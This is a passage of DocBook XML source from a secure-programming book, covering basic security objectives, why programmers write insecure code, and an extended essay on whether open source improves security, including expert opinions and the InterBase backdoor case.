principles (although, since they're abstract, they're insufficient for
|
||
actually building secure programs - hence this book);
|
||
you can get a copy at
|
||
<ulink url="http://csrc.nist.gov/publications/nistpubs/800-27/sp800-27.pdf">
|
||
http://csrc.nist.gov/publications/nistpubs/800-27/sp800-27.pdf</ulink>.
|
||
A few security principles are summarized here.
|
||
</para>
|
||
|
||
<para>
|
||
Often computer security objectives (or goals) are described in terms of three
|
||
overall objectives:
|
||
|
||
<itemizedlist>
|
||
<listitem>
|
||
|
||
<para>
|
||
<emphasis remap="it">Confidentiality</emphasis> (also known as secrecy), meaning that the
|
||
computing system's assets can be read only by authorized parties.
|
||
</para>
|
||
</listitem>
|
||
<listitem>
|
||
|
||
<para>
|
||
<emphasis remap="it">Integrity</emphasis>, meaning that the assets can only be modified or deleted by
|
||
authorized parties in authorized ways.
|
||
</para>
|
||
</listitem>
|
||
<listitem>
|
||
|
||
<para>
|
||
<emphasis remap="it">Availability</emphasis>,
|
||
meaning that the assets are accessible to the authorized
|
||
parties in a timely manner (as determined by the systems requirements).
|
||
The failure to meet this goal is called a denial of service.
|
||
</para>
|
||
</listitem>
|
||
|
||
</itemizedlist>
|
||
|
||
|
||
Some people define additional major security objectives, while others lump
|
||
those additional goals as special cases of these three.
|
||
For example, some separately
|
||
identify non-repudiation as an objective; this is
|
||
the ability to ``prove'' that a sender sent or receiver received a message
|
||
(or both), even if the sender or receiver wishes to deny it later.
|
||
Privacy is sometimes addressed separately from confidentiality;
|
||
some define this as protecting the confidentiality of a
|
||
<emphasis>user</emphasis> (e.g., their identity) instead of the data.
|
||
Most objectives require identification and authentication, which is
|
||
sometimes listed as a separate objective.
|
||
Often auditing (also called accountability) is identified
|
||
as a desirable security objective.
|
||
Sometimes ``access control'' and ``authenticity'' are listed separately
|
||
as well.
|
||
For example,
|
||
The U.S. Department of Defense (DoD), in DoD directive 3600.1
|
||
<!-- (both December 9, 1996 and October 2001) -->
|
||
defines ``information assurance'' as
|
||
``information operations (IO) that protect and defend
|
||
information and information systems by ensuring
|
||
their availability, integrity, authentication,
|
||
confidentiality, and nonrepudiation.
|
||
This includes providing for restoration of information systems by
|
||
incorporating protection, detection, and reaction capabilities.''
|
||
</para>
|
||
|
||
|
||
<!--
|
||
It defines ``information operations'' as
|
||
``actions taken to affect adversary information, information systems
|
||
and decision making, while defending one's own information, information
|
||
systems and decision making.''
|
||
|
||
This is also stated in the
|
||
National Security Telecommunications and Information Systems Security Committee
|
||
(later renamed to the Committee on National Security Systems)
|
||
released the
|
||
<ulink url="http://www.nstissc.gov/Assets/pdf/4009.pdf">
|
||
``National Information Systems Security (INFOSEC) Glossary''</ulink>
|
||
(NSTISSI No. 4009), Sept 2000.
|
||
|
||
The Industry Advisory Council's Information Assurance (IA)
|
||
Special Interest Group (SIG), in their
|
||
<ulink url="http://www.iaconline.org/sig_infoassure.html">
|
||
Information Assurance Glossary</ulink>, defines information assurance as
|
||
``Conducting those operations that protect and defend
|
||
information and information systems by ensuring
|
||
availability, integrity, authentication, confidentiality,
|
||
and non-repudiation. This includes providing for restoration
|
||
of information systems by incorporating protection,
|
||
detection and reaction capabilities.''
|
||
The U.S. Air Force's AFI 33-204 uses a similar definition for IA;
|
||
http://web1.deskbook.osd.mil/htmlfiles/rlframe/REFLIB_Frame.asp?TOC=/htmlfiles/TOC/330fktoc.asp?sNode=R&Exp=N&Doc=/reflib/maf/330fk/330fkdoc.htm&BMK=T2
|
||
it defines Information Assurance (IA)
|
||
as ``Information operations that protect and defend information
|
||
and information systems by ensuring their availability, integrity,
|
||
authentication, confidentiality, and nonrepudiation.
|
||
This includes providing for restoration of information systems
|
||
by incorporating protection, detection, and reaction capabilities.''
|
||
-->
|
||
<para>
|
||
In any case, it is important to identify your program's overall
|
||
security objectives, no matter how you group them together,
|
||
so that you'll know when you've met them.
|
||
</para>
|
||
|
||
<!-- ???: Reference other classics? Orange Book? CC? See
|
||
http://seclab.cs.ucdavis.edu/projects/history/seminal.html
|
||
|
||
Reference other Computer security websites and issues, including:
|
||
http://www.centralwebs.co.uk/Links/secure.html
|
||
Maximum Security's appendix:
|
||
http://www.uzsci.net/documentation/Books/Max_Security/apa/apa.htm
|
||
|
||
Multi-player games -
|
||
How to Hurt the Hackers: The Scoop on Internet Cheating
|
||
and How You Can Combat It
|
||
By Matt Pritchard
|
||
Gamasutra
|
||
July 24, 2000
|
||
http://www.gamasutra.com/features/20000724/pritchard_pfv.htm
|
||
-->
|
||
|
||
<para>
|
||
Sometimes these objectives are a response to a known set of threats,
|
||
and sometimes some of these objectives are required by law.
|
||
For example, for U.S. banks and other financial institutions,
|
||
there's a new privacy law called the ``Gramm-Leach-Bliley'' (GLB) Act.
|
||
This law mandates disclosure of personal information shared and
|
||
means of securing that data, requires disclosure of personal information
|
||
that will be shared with third parties, and directs institutions to
|
||
give customers a chance to opt out of data sharing.
|
||
[Jones 2000]
|
||
</para>
|
||
|
||
<para>
|
||
There is sometimes conflict between security and some other general
|
||
system/software engineering principles.
|
||
Security can sometimes interfere with ``ease of use'', for example,
|
||
installing a secure configuration may take more effort than a
|
||
``trivial'' installation that works but is insecure.
|
||
Often, this apparent conflict can be resolved, for example, by re-thinking
|
||
a problem it's often possible to make a secure system also easy to use.
|
||
There's also sometimes a conflict between security and abstraction
|
||
(information hiding);
|
||
for example, some high-level library routines may be implemented securely
|
||
or not, but their specifications won't tell you.
|
||
In the end, if your application must be secure, you must do things yourself
|
||
if you can't be sure otherwise - yes, the library should be fixed, but
|
||
it's your users who will be hurt by your poor choice of library routines.
|
||
</para>
|
||
|
||
<para>
|
||
A good general security principle is ``defense in depth'';
|
||
you should have numerous defense mechanisms (``layers'') in place,
|
||
designed so that an attacker has to defeat multiple mechanisms to
|
||
perform a successful attack.
|
||
</para>
|
||
|
||
</sect1>
|
||
|
||
<sect1 id="why-write-insecure">
|
||
<title>Why do Programmers Write Insecure Code?</title>
|
||
<para>
|
||
Many programmers don't intend to write insecure code - but do anyway.
|
||
Here are a number of purported reasons for this.
|
||
Most of these were collected and summarized by Aleph One on Bugtraq
|
||
(in a posting on December 17, 1998):
|
||
<!-- Title: Re: Learning security [SUMMARY] -->
|
||
<itemizedlist>
|
||
<listitem><para>
|
||
There is no curriculum that addresses computer security in most schools.
|
||
Even when there <emphasis>is</emphasis> a computer security curriculum, they
|
||
often don't discuss how to write secure programs as a whole.
|
||
Many such curriculum only study certain areas such as
|
||
cryptography or protocols.
|
||
These are important, but they often fail to discuss common real-world issues
|
||
such as buffer overflows, string formatting, and input checking.
|
||
I believe this is one of the most important problems; even those programmers
|
||
who go through colleges and universities are very unlikely to learn
|
||
how to write secure programs, yet we depend on those very people to
|
||
write secure programs.
|
||
</para></listitem>
|
||
<listitem><para>
|
||
Programming books/classes do not teach secure/safe programming techniques.
|
||
Indeed, until recently there were no books on how to write secure programs
|
||
at all (this book is one of those few).
|
||
</para></listitem>
|
||
<listitem><para>
|
||
No one uses formal verification methods.
|
||
</para></listitem>
|
||
<listitem><para>
|
||
C is an unsafe language, and the standard C library string functions
|
||
are unsafe.
|
||
This is particularly important because C is so widely used -
|
||
the ``simple'' ways of using C permit dangerous exploits.
|
||
</para></listitem>
|
||
<listitem><para>
|
||
Programmers do not think ``multi-user.''
|
||
</para></listitem>
|
||
<listitem><para>
|
||
Programmers are human, and humans are lazy.
|
||
Thus, programmers will often use the ``easy'' approach instead of a
|
||
secure approach - and once it works, they often fail to fix it later.
|
||
</para></listitem>
|
||
<listitem><para>
|
||
Most programmers are simply not good programmers.
|
||
</para></listitem>
|
||
<listitem><para>
|
||
Most programmers are not security people; they simply don't often
|
||
think like an attacker does.
|
||
</para></listitem>
|
||
<listitem><para>
|
||
Most security people are not programmers.
|
||
This was a statement made by some Bugtraq contributors, but it's not clear
|
||
that this claim is really true.
|
||
</para></listitem>
|
||
<listitem><para>
|
||
Most computer security models are terrible.
|
||
</para></listitem>
|
||
<listitem><para>
|
||
There is lots of ``broken'' legacy software.
|
||
Fixing this software (to remove security faults or to make it work with
|
||
more restrictive security policies) is difficult.
|
||
</para></listitem>
|
||
<listitem><para>
|
||
Consumers don't care about security.
|
||
(Personally, I have hope that consumers are beginning to care about security;
|
||
a computer system that is constantly exploited is neither useful
|
||
nor user-friendly.
|
||
Also, many consumers are unaware that there's
|
||
even a problem, assume that it can't happen to them, or think that
|
||
that things cannot be made better.)
|
||
</para></listitem>
|
||
<listitem><para>
|
||
Security costs extra development time.
|
||
</para></listitem>
|
||
<listitem><para>
|
||
Security costs in terms of additional testing
|
||
(red teams, etc.).
|
||
</para></listitem>
|
||
</itemizedlist>
|
||
</para>
|
||
</sect1>
|
||
|
||
<sect1 id="open-source-security">
|
||
<title>Is Open Source Good for Security?</title>
|
||
|
||
<para>
|
||
There's been a lot of debate by security practitioners
|
||
about the impact of open source approaches on security.
|
||
One of the key issues is that open source exposes the source code
|
||
to examination by everyone, both the attackers and defenders,
|
||
and reasonable people disagree about the ultimate impact of this situation.
|
||
(Note - you can get the latest version of this essay by going to the
|
||
main website for this book,
|
||
<ulink url="http://www.dwheeler.com/secure-programs">
|
||
http://www.dwheeler.com/secure-programs</ulink>.
|
||
</para>
|
||
|
||
<sect2 id="open-source-security-experts">
|
||
<title>View of Various Experts</title>
|
||
|
||
<para>
|
||
First, let's exampine what security experts have to say.
|
||
</para>
|
||
|
||
<para>
|
||
Bruce Schneier is a well-known expert on computer security and cryptography.
|
||
He argues that smart engineers should ``demand
|
||
open source code for anything related to security'' [Schneier 1999],
|
||
and he also discusses some of the preconditions which must be met to make
|
||
open source software secure.
|
||
<!-- http://www.counterpane.com/crypto-gram-0205.html#1
|
||
Probably too detailed...
|
||
A basic rule of cryptography is to use published, public,
|
||
algorithms and protocols.
|
||
This principle was first stated in 1883 by Auguste Kerckhoffs:
|
||
in a well-designed cryptographic system, only the key needs to be secret;
|
||
there should be no secrecy in the algorithm.
|
||
Modern cryptographers have embraced this principle, calling
|
||
anything else "security by obscurity."
|
||
Any system that tries to keep its algorithms secret for security reasons
|
||
is quickly dismissed by the community, and referred to as "snake oil"
|
||
or even worse.
|
||
This is true for cryptography, but the general relationship between secrecy and security is more complicated than Kerckhoffs' Principle indicates. ...
|
||
Kerckhoffs' Principle generalizes to the following design guideline:
|
||
minimize the number of secrets in your security system.
|
||
To the extent that you can accomplish that,
|
||
you increase the robustness of your security.
|
||
To the extent you can't, you increase its fragility.
|
||
-->
|
||
Vincent Rijmen, a developer of the winning Advanced Encryption Standard (AES)
|
||
encryption algorithm, believes that
|
||
the open source nature of Linux
|
||
provides a superior vehicle to making security vulnerabilities easier
|
||
to spot and fix, ``Not only because more people can look at it, but,
|
||
more importantly, because the model forces people to write more clear
|
||
code, and to adhere to standards. This in turn facilitates security review''
|
||
[Rijmen 2000].
|
||
</para>
|
||
|
||
<para>
|
||
Elias Levy (Aleph1) is the former moderator of one of the most
|
||
popular security discussion groups - Bugtraq.
|
||
He discusses some of the problems in making open source
|
||
software secure in his article
|
||
<ulink url="http://www.securityfocus.com/commentary/19">"Is Open Source
|
||
Really More Secure than Closed?"</ulink>.
|
||
His summary is:
|
||
<blockquote>
|
||
<para>
|
||
So does all this mean Open Source Software is no better than closed
|
||
source software when it comes to security vulnerabilities? No. Open
|
||
Source Software certainly does have the potential to be more secure
|
||
than its closed source counterpart.
|
||
But make no mistake, simply being open source is no guarantee of security.
|
||
</para>
|
||
</blockquote>
|
||
</para>
|
||
|
||
<para>
|
||
Whitfield Diffie is the
|
||
co-inventor of public-key cryptography (the basis of all Internet security)
|
||
and chief security officer and senior staff engineer at Sun Microsystems.
|
||
In his 2003 article
|
||
<ulink url="http://zdnet.com.com/2100-1107-980938.html">
|
||
Risky business: Keeping security a secret</ulink>,
|
||
he argues that proprietary vendor's claims that their software
|
||
is more secure because it's secret is nonsense.
|
||
He identifies and then counters two main claims made by proprietary vendors:
|
||
(1) that release of code benefits attackers more than anyone else because
|
||
a lot of hostile eyes can also look at open-source code, and
|
||
that (2) a few expert eyes are better than several random ones.
|
||
He first notes that while giving programmers access to a piece of software
|
||
doesn't guarantee they will study it carefully,
|
||
there is a group of programmers who can be expected to care deeply:
|
||
Those who either use the software personally or work for an
|
||
enterprise that depends on it.
|
||
"In fact, auditing the programs on which an enterprise depends for
|
||
its own security is a natural function of the enterprise's own
|
||
information-security organization."
|
||
He then counters the second argument, noting that
|
||
"As for the notion that open source's usefulness to opponents
|
||
outweighs the advantages to users, that argument flies in
|
||
the face of one of the most important principles in security:
|
||
A secret that cannot be readily changed should be regarded as a vulnerability."
|
||
He closes noting that
|
||
<blockquote>
|
||
<para>
|
||
"It's simply unrealistic to depend on secrecy for security in
|
||
computer software.
|
||
You may be able to keep the exact workings of the program out of general
|
||
circulation, but can you prevent the code from being
|
||
reverse-engineered by serious opponents? Probably not."
|
||
</para>
|
||
</blockquote>
|
||
|
||
|
||
</para>
|
||
|
||
<para>
|
||
John Viega's article
|
||
<ulink url="http://dev-opensourceit.earthweb.com/news/000526_security.html">"The Myth of Open Source Security"</ulink> also discusses
|
||
issues, and summarizes things this way:
|
||
<blockquote>
|
||
<para>
|
||
Open source software projects can be more secure than closed
|
||
source projects. However, the very things that can make open
|
||
source programs secure -- the availability of the source code,
|
||
and the fact that large numbers of users are available to look
|
||
for and fix security holes -- can also lull people into a false
|
||
sense of security.
|
||
</para>
|
||
</blockquote>
|
||
</para>
|
||
|
||
<para>
|
||
<ulink url="http://www.linuxworld.com/linuxworld/lw-1998-11/lw-11-ramparts.html">Michael H. Warfield's "Musings on open source security"</ulink> is
|
||
very positive about the impact of open source software on security.
|
||
In contrast,
|
||
Fred Schneider doesn't believe that open source helps security, saying
|
||
``there is no reason to believe that the many eyes inspecting (open)
|
||
source code would be successful in identifying bugs that allow
|
||
system security to be compromised'' and claiming that
|
||
``bugs in the code are not the dominant means of attack'' [Schneider 2000].
|
||
He also claims that open source rules out control of the construction
|
||
process, though in practice there is such control - all major open source
|
||
programs have one or a few official versions with ``owners'' with
|
||
reputations at stake.
|
||
Peter G. Neumann discusses ``open-box'' software (in which source code
|
||
is available, possibly only under certain conditions), saying
|
||
``Will open-box software really improve system security?
|
||
My answer is not by itself, although the potential is considerable''
|
||
[Neumann 2000].
|
||
TruSecure Corporation, under sponsorship by Red Hat (an open source company),
|
||
has developed a paper on why they believe open source is more
|
||
effective for security [TruSecure 2001].
|
||
<ulink url="http://www-106.ibm.com/developerworks/linux/library/l-oss.html?open&I=252,t=gr,p=SeclmpOS">Natalie Walker Whitlock's IBM DeveloperWorks article</ulink>
|
||
discusses the pros and cons as well.
|
||
Brian Witten, Carl Landwehr, and Micahel Caloyannides [Witten 2001]
|
||
published in IEEE Software an article tentatively concluding that
|
||
having source code available should work in the favor of system security;
|
||
they note:
|
||
<blockquote>
|
||
<para>
|
||
``We can draw four additional conclusions from this discussion. First,
|
||
access to source code lets users improve system security -- if they have
|
||
the capability and resources to do so. Second, limited tests indicate that
|
||
for some cases, open source life cycles produce systems that are less
|
||
vulnerable to nonmalicious faults. Third, a survey of three operating
|
||
systems indicates that one open source operating system experienced less
|
||
exposure in the form of known but unpatched vulnerabilities over a 12-month
|
||
period than was experienced by either of two proprietary counterparts.
|
||
Last, closed and proprietary system development models face disincentives
|
||
toward fielding and supporting more secure systems as long as less secure
|
||
systems are more profitable. Notwithstanding these conclusions, arguments
|
||
in this important matter are in their formative stages and in dire need of
|
||
metrics that can reflect security delivered to the customer.''
|
||
</para>
|
||
</blockquote>
|
||
</para>
|
||
|
||
<para>
|
||
Scott A. Hissam and Daniel Plakosh's
|
||
<ulink url="http://www.ics.uci.edu/~wscacchi/Papers/New/IEE_hissam.pdf">
|
||
``Trust and Vulnerability in Open Source Software''</ulink>
|
||
discuss the pluses and minuses of open source software.
|
||
As with other papers, they note that just because the software
|
||
is open to review, it should not automatically follow that
|
||
such a review has actually been performed.
|
||
Indeed, they note that this is a general problem for all software,
|
||
open or closed - it is often questionable if many people examine any
|
||
given piece of software.
|
||
One interesting point is that they demonstrate that
|
||
attackers can learn about a
|
||
vulnerability in a closed source program (Windows)
|
||
from patches made to an OSS/FS program (Linux).
|
||
In this example,
|
||
Linux developers fixed a vulnerability before attackers tried to attack it,
|
||
and attackers correctly surmised that a similar problem might be still be in
|
||
Windows (and it was).
|
||
Unless OSS/FS programs are forbidden, this kind of learning is difficult
|
||
to prevent.
|
||
Therefore, the existance of an OSS/FS program can reveal the vulnerabilities
|
||
of both the OSS/FS and proprietary program performing the same function -
|
||
but at in this example, the OSS/FS program was fixed first.
|
||
</para>
|
||
</sect2>
|
||
|
||
<sect2 id="open-source-security-nohalt">
|
||
<title>Why Closing the Source Doesn't Halt Attacks</title>
|
||
|
||
<para>
|
||
It's been argued that a
|
||
system without source code is more secure because,
|
||
since there's less information available for an attacker, it should
|
||
be harder for an attacker to find the vulnerabilities.
|
||
This argument has a number of weaknesses, however, because
|
||
although source code is extremely important when trying to add
|
||
new capabilities to a program,
|
||
attackers generally don't need source code to find a vulnerability.
|
||
</para>
|
||
|
||
<para>
|
||
First, it's important to distinguish between ``destructive'' acts
|
||
and ``constructive'' acts. In the real world, it is much easier to
|
||
destroy a car than to build one. In the software world, it is
|
||
much easier to find and exploit a vulnerability than to
|
||
add new significant new functionality to that software.
|
||
Attackers have many advantages against defenders because of this difference.
|
||
Software developers must try to have no security-relevant mistakes
|
||
anywhere in their code, while attackers only need to find one.
|
||
Developers are primarily paid to get their programs to work...
|
||
attackers don't need to make the program work, they only need to
|
||
find a single weakness. And as I'll describe in a moment, it takes
|
||
less information to attack a program than to modify one.
|
||
</para>
|
||
|
||
<para>
|
||
Generally attackers (against both open and closed programs) start by
|
||
knowing about the general kinds of security problems programs have.
|
||
There's no point in hiding this information; it's already out, and
|
||
in any case, defenders need that kind of information to defend
|
||
themselves.
|
||
Attackers then use techniques to try to find those problems;
|
||
I'll group the techniques into ``dynamic'' techniques (where you
|
||
run the program) and ``static'' techniques (where you examine
|
||
the program's code - be it source code or machine code).
|
||
</para>
|
||
|
||
<para>
|
||
In ``dynamic'' approaches, an attacker runs the program,
|
||
sending it data (often problematic data), and sees
|
||
if the programs' response indicates a common vulnerability.
|
||
Open and closed programs have no difference here, since the attacker isn't
|
||
looking at code.
|
||
|
||
Attackers may also look at the code, the ``static'' approach.
|
||
For open source software, they'll
|
||
probably look at the source code and search it for patterns.
|
||
For closed source software, they might search the machine code
|
||
(usually presented in assembly language format to simplify the
|
||
task) for essentially the same patterns.
|
||
They might also use tools called
|
||
``decompilers'' that turn the machine code back into source code
|
||
and then search the source code for the vulnerable patterns
|
||
(the same way they would search for vulnerabilities in open source software).
|
||
See Flake [2001] for one discussion of how closed code can still be examined
|
||
for security vulnerabilities (e.g., using disassemblers).
|
||
This point is important:
|
||
even if an attacker wanted to use source code to find a vulnerability,
|
||
a closed source program has no advantage, because the attacker
|
||
can use a disassembler to re-create the source code of the product.
|
||
</para>
|
||
|
||
<para>
|
||
Non-developers might ask ``if decompilers can create source code
|
||
from machine code, then why do developers say they need
|
||
source code instead of just machine code?''
|
||
The problem is that although developers don't need source
|
||
code to find security problems, developers do need source code to make
|
||
substantial improvements to the program.
|
||
Although decompilers can turn machine code back into a
|
||
``source code'' of sorts, the resulting source code
|
||
is extremely hard to modify. Typically most understandable names are
|
||
lost, so instead of variables like ``grand_total'' you get
|
||
``x123123'', instead of methods like ``display_warning'' you get
|
||
``f123124'', and the code itself may have spatterings of
|
||
assembly in it.
|
||
Also, _ALL_ comments and design information are lost.
|
||
This isn't a serious problem for finding security problems, because
|
||
generally you're searching for patterns indicating vulnerabilities,
|
||
not for internal variable or method names.
|
||
Thus, decompilers can be useful for finding ways to attack programs,
|
||
but aren't helpful for updating programs.
|
||
</para>
|
||
|
||
<para>
|
||
Thus, developers will say ``source code is vital''
|
||
when they intend to add functionality), but the fact that the source
|
||
code for closed source programs is hidden doesn't protect the program
|
||
very much.
|
||
</para>
|
||
|
||
<!--
|
||
Thus, defenders won't usually look for problems if they
|
||
don't have the source code, so not having the source code puts defenders
|
||
at a disadvantage compared to attackers.
|
||
-->
|
||
</sect2>
|
||
|
||
<sect2 id="open-source-security-secrets">
|
||
<title>Why Keeping Vulnerabilities Secret Doesn't Make Them Go Away</title>
|
||
|
||
<para>
|
||
Sometimes it's noted that a vulnerability that exists but is unknown
|
||
can't be exploited, so the system ``practically secure.''
|
||
In theory this is true, but the problem is that once someone finds
|
||
the vulnerability, the finder may just exploit
|
||
the vulnerability instead of helping to fix it.
|
||
Having unknown vulnerabilities doesn't really make the vulnerabilities go away;
|
||
it simply means that the vulnerabilities are a time bomb, with no
|
||
way to know when they'll be exploited.
|
||
Fundamentally, the problem of someone exploiting a vulnerability they
|
||
discover is a problem for both open and closed source systems.
|
||
</para>
|
||
|
||
<para>
|
||
One related claim sometimes made
|
||
(though not as directly related to OSS/FS)
|
||
is that people should not post warnings about
|
||
vulnerabilities and discuss them.
|
||
This sounds good in theory, but the problem is that attackers already
|
||
distribute information about vulnerabilities through a large number
|
||
of channels.
|
||
In short, such approaches would leave
|
||
defenders vulnerable, while doing nothing to inhibit attackers.
|
||
In the past, companies actively tried to prevent disclosure of vulnerabilities,
|
||
but experience showed that, in general, companies didn't fix vulnerabilities
|
||
until they were widely known to their users (who could then insist that
|
||
the vulnerabilities be fixed).
|
||
This is all part of the argument for ``full disclosure.''
|
||
Gartner Group has a blunt commentary in a CNET.com article titled
|
||
``Commentary: Hype is the real issue - Tech News.''
|
||
They stated:
|
||
<blockquote>
|
||
<para>
|
||
The comments of Microsoft's Scott Culp, manager of the company's
|
||
security response center, echo a common refrain in a long, ongoing
|
||
battle over information. Discussions of morality regarding the
|
||
distribution of information go way back and are very familiar. Several
|
||
centuries ago, for example, the church tried to squelch Copernicus'
|
||
and Galileo's theory of the sun being at the center of the solar
|
||
system...
|
||
|
||
Culp's attempt to blame "information security professionals" for the
|
||
recent spate of vulnerabilities in Microsoft products is at best
|
||
disingenuous. Perhaps, it also represents an attempt to deflect
|
||
criticism from the company that built those products...
|
||
|
||
[The] efforts of all parties contribute to a continuous
|
||
process of improvement. The more widely vulnerabilities become known,
|
||
the more quickly they get fixed.
|
||
</para>
|
||
</blockquote>
|
||
<!-- http://technews.netscape.com/news/0-1003-201-7573979-0.html -->
|
||
<!-- Here's the entire text of the article:
|
||
The comments of Microsoft's Scott Culp, manager of the company's
|
||
security response center, echo a common refrain in a long, ongoing
|
||
battle over information. Discussions of morality regarding the
|
||
distribution of information go way back and are very familiar. Several
|
||
centuries ago, for example, the church tried to squelch Copernicus'
|
||
and Galileo's theory of the sun being at the center of the solar
|
||
system, and in the 20th century Darwin's writings about the theory of
|
||
evolution were banned in a number of states in the United States.
|
||
|
||
Culp's attempt to blame "information security professionals" for the
|
||
recent spate of vulnerabilities in Microsoft products is at best
|
||
disingenuous. Perhaps, it also represents an attempt to deflect
|
||
criticism from the company that built those products.
|
||
|
||
Culp has also manufactured some new numbers related to the losses
|
||
suffered by companies because of the vulnerabilities in Microsoft's
|
||
Internet Information Server (IIS). Culp says the losses amount to
|
||
billions of dollars. Gartner believes that hype associated with
|
||
security risks is the real problem, and that companies engaging in
|
||
hype are culpable.
|
||
|
||
Security firms and professionals have already begun to cut back on
|
||
self-serving press releases and hyperbole while they also research and
|
||
discover new vulnerabilities and responsibly disseminate new
|
||
information. Thus, to criticize those contributions to awareness and
|
||
early warning while using unfounded numbers to make a point is a shot
|
||
gone astray in the ongoing battle between information freedom and
|
||
control.
|
||
|
||
In truth, the responsibility for information security falls to the
|
||
entire IT community - - software companies, security firms, businesses
|
||
and individuals. None should shoulder the whole blame for security
|
||
lapses. Rather, the efforts of all parties contribute to a continuous
|
||
process of improvement. The more widely vulnerabilities become known,
|
||
the more quickly they get fixed.
|
||
-->
|
||
|
||
<!--
|
||
http://www.eweek.com/article/0,3658,s%253D701%2526a%253D26875,00.asp
|
||
May 13, 2002
|
||
Allchin: Disclosure May Endanger U.S.
|
||
By Caron Carlson
|
||
|
||
...
|
||
He later acknowledged that some Microsoft code was so flawed it could not be safely disclosed.
|
||
The bold statements and candid admissions were part of Jim Allchin's testimony during two days in court here before Judge Colleen Kollar-Kotelly, who is hearing the case of nine states and the District of Columbia seeking stricter penalties for Microsoft's antitrust behavior.
|
||
Microsoft has already identified at least one protocol and two APIs that it plans to withhold from public disclosure under the security carve-out.
|
||
|
||
The protocol, which is part of Message Queuing, contains a coding mistake that would threaten the security of enterprise systems using it if it were disclosed, Allchin said.
|
||
When pressed for further details, Allchin said he did not want to offer specifics because Microsoft is trying to work on its reputation regarding security. "The fact that I even mentioned the Message Queuing thing bothers me," he said.
|
||
|
||
|
||
Note, however, that Microsoft code has already escaped!
|
||
Besides, it can be trivially disassembled.
|
||
-->
|
||
</para>
|
||
</sect2>
|
||
|
||
<sect2 id="open-source-security-trojans">
|
||
<title>How OSS/FS Counters Trojan Horses</title>
|
||
|
||
|
||
<para>
|
||
It's sometimes argued that open source programs, because there's no
|
||
enforced control by a single company, permit people to insert Trojan
|
||
Horses and other malicious code.
|
||
Trojan horses can be inserted into open source code, true, but they
|
||
can also be inserted into proprietary code.
|
||
A disgruntled or bribed employee can insert malicious code, and
|
||
in many organizations it's much less likely to be found than in an
|
||
open source program.
|
||
After all,
|
||
no one outside the organization can review the source code, and few
|
||
companies review their code internally (or, even if they do, few can
|
||
be assured that the reviewed code is actually what is used).
|
||
And the notion that a closed-source company can be sued later has little
|
||
evidence; nearly all licenses disclaim all warranties, and courts have
|
||
generally not held software development companies liable.
|
||
</para>
|
||
|
||
<para>
|
||
Borland's InterBase server is an interesting case in point.
|
||
Some time between 1992 and 1994, Borland inserted an intentional
|
||
``back door'' into their database server, ``InterBase''.
|
||
This back door allowed any local or remote user to
|
||
manipulate any database object and install arbitrary programs, and
|
||
in some cases could lead to controlling the machine as ``root''.
|
||
This vulnerability stayed in the product for at least 6 years - no one else
|
||
could review the product, and Borland had no incentive to remove the
|
||
vulnerability.
|
||
Then Borland released its source code on July 2000.
|
||
The "Firebird" project began working with the source code, and
|
||
uncovered this serious security problem
|
||
with InterBase in December 2000.
|
||
By January 2001 the CERT announced the existence of this back door as
|
||
<ulink url="http://www.cert.org/advisories/CA-2001-01.html">CERT
|
||
advisory CA-2001-01</ulink>.
|
||
What's discouraging is that the backdoor can be easily found simply by
|
||
looking at an ASCII dump of the program (a common cracker trick).
|
||
Once this problem was found by open source developers reviewing
|
||
the code, it was patched quickly.
|
||
You could argue that, by keeping the password unknown,
|
||
the program stayed safe, and that opening the source made
|
||
the program less secure.
|
||
I think this is nonsense, since ASCII dumps are trivial to do and well-known
|
||
as a standard attack technique, and not all attackers have sudden
|
||
urges to announce vulnerabilities - in fact, there's no way to be
|
||
certain that this vulnerability has not been exploited many times.
|
||
It's clear that after the source was opened, the source code was
|
||
reviewed over time, and the vulnerabilities found and fixed.
|
||
One way to characterize this is to say that the original code was
|
||
vulnerable, its vulnerabilities became easier to exploit
|
||
when it was first made open source,
|
||
and then finally these vulnerabilities were fixed.
|
||
<!--
|
||
The 1992-1994 date is from
|
||
http://slashdot.org/articles/01/01/11/1318207.shtml
|
||
The December 2000 and other info is from:
|
||
http://firebird.ibphoenix.com/home.nfs?a=ibphoenix&s=979248432:339&page=starkey
|
||
-->
|
||
</para>
|
||
</sect2>
|
||
|
||
<sect2 id="open-source-security-other">
|
||
<title>Other Advantages</title>
|
||
|
||
|
||
<para>
|
||
The advantages of having source code open extends not just to software
|
||
that is being attacked, but also extends to vulnerability assessment
|
||
scanners.
|
||
Vulnerability assessment scanners intentionally look for vulnerabilities
|
||
in configured systems.
|
||
A recent Network Computing evaluation found that the best scanner
|
||
(which, among other things, found the most legitimate vulnerabilities)
|
||
was Nessus, an open source scanner [Forristal 2001].
|
||
</para>
|
||
</sect2>
|
||
|
||
<sect2 id="open-source-security-bottom-line">
|
||
<title>Bottom Line</title>
|
||
|
||
<para>
|
||
So, what's the bottom line?
|
||
I personally believe that when a program began as closed source and
|
||
is then first made open source, it
|
||
often starts less secure for any users (through exposure of
|
||
vulnerabilities), and over time (say a few years) it has
|
||
the potential to be much more secure than a closed program.
|
||
If the program began as open source software, the public scrutiny is
|
||
more likely to improve its security before it's ready for use by
|
||
significant numbers of users, but there are several caveats to this
|
||
statement (it's not an ironclad rule).
|
||
Just making a program open source doesn't suddenly make a program secure,
|
||
and just because a program is open source does not guarantee security:
|
||
<itemizedlist>
|
||
<listitem><para>
|
||
First, people have to actually review the code.
|
||
This is one of the key points of debate - will people really
|
||
review code in an open source project?
|
||
All sorts of factors can reduce the amount of review:
|
||
being a niche or rarely-used product (where there are few potential reviewers),
|
||
having few developers, and use of a rarely-used computer language.
|
||
Clearly, a program that has a single developer and no other contributors
|
||
of any kind doesn't have this kind of review.
|
||
On the other hand, a program that has a primary author and many other
|
||
people who occasionally examine the code and contribute suggests that there
|
||
are others reviewing the code (at least to create contributions).
|
||
In general, if there are more reviewers, there's generally a higher likelihood
|
||
that someone will identify a flaw - this is the basis of the
|
||
``many eyeballs'' theory.
|
||
Note that, for example, the OpenBSD project continuously examines
|
||
programs for security flaws, so the components in its innermost parts
|
||
have certainly undergone a lengthy review.
|
||
Since OSS/FS discussions are often held publicly, this level of
|
||
review is something that potential users can judge for themselves.
|
||
</para>
|
||
<para>
|
||
One factor that can particularly reduce review likelihood is not actually
|
||
being open source.
|
||
Some vendors like to posture their ``disclosed source''
|
||
(also called ``source available'') programs as
|
||
being open source, but since the program owner has extensive exclusive rights,
|
||
others will have far less incentive to work ``for free'' for the owner
|
||
on the code.
|
||
Even open source licenses which have unusually
|
||
asymmetric rights (such as the MPL) have this problem.
|
||
After all, people are less likely to voluntarily participate
|
||
if someone else will have rights to their results that they don't have
|
||
